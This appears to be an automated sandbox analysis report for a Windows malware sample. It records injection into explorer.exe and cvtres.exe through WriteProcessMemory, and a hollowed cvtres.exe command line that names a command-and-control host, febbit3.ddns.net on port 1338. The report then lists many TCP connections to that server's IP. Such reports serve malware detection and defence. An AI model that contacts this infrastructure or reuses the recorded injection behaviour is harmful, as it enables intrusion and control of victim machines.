Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3004 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\explorer.exe
PID 3004 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\explorer.exe
PID 3004 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3004 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 5028 wrote to memory of 4496 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe
PID 5028 wrote to memory of 4496 N/A C:\Windows\explorer.exe C:\Windows\system32\ctfmon.exe

Processes

C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe

"C:\Users\Admin\AppData\Local\Temp\869e6e56d6c9849420442213a468c9fc.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 5T74S3 febbit3.ddns.net 1338 Y5EJ2C

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 5T74S3 febbit3.ddns.net 1338 Y5EJ2C

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3004 -s 904

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe

"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 80.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 febbit3.ddns.net udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 febbit3.ddns.net udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 9.57.101.20.in-addr.arpa udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 febbit3.ddns.net udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 febbit3.ddns.net udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
US 8.8.8.8:53 febbit3.ddns.net udp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 febbit3.ddns.net tcp
NL 146.190.232.131:1338 tcp

Files

memory/3004-0-0x00000256AAA70000-0x00000256AAA98000-memory.dmp

memory/800-1-0x0000000000400000-0x0000000000416000-memory.dmp

memory/3004-2-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmp

memory/800-5-0x0000000073140000-0x000000007382E000-memory.dmp

memory/800-6-0x0000000009130000-0x00000000091C2000-memory.dmp

memory/800-7-0x00000000091D0000-0x000000000926C000-memory.dmp

memory/800-8-0x0000000009420000-0x0000000009430000-memory.dmp

memory/800-9-0x0000000009930000-0x0000000009E2E000-memory.dmp

memory/800-10-0x0000000009F30000-0x0000000009F96000-memory.dmp

memory/800-13-0x000000000A0A0000-0x000000000A0F0000-memory.dmp

memory/5028-17-0x0000000002D80000-0x0000000002D81000-memory.dmp

memory/1028-23-0x000001A6BF500000-0x000001A6BF520000-memory.dmp

memory/1028-26-0x000001A6BF680000-0x000001A6BF6A0000-memory.dmp

memory/3004-76-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmp

memory/800-82-0x0000000073140000-0x000000007382E000-memory.dmp

memory/800-87-0x0000000009420000-0x0000000009430000-memory.dmp

memory/5028-104-0x00000000051A0000-0x0000000005335000-memory.dmp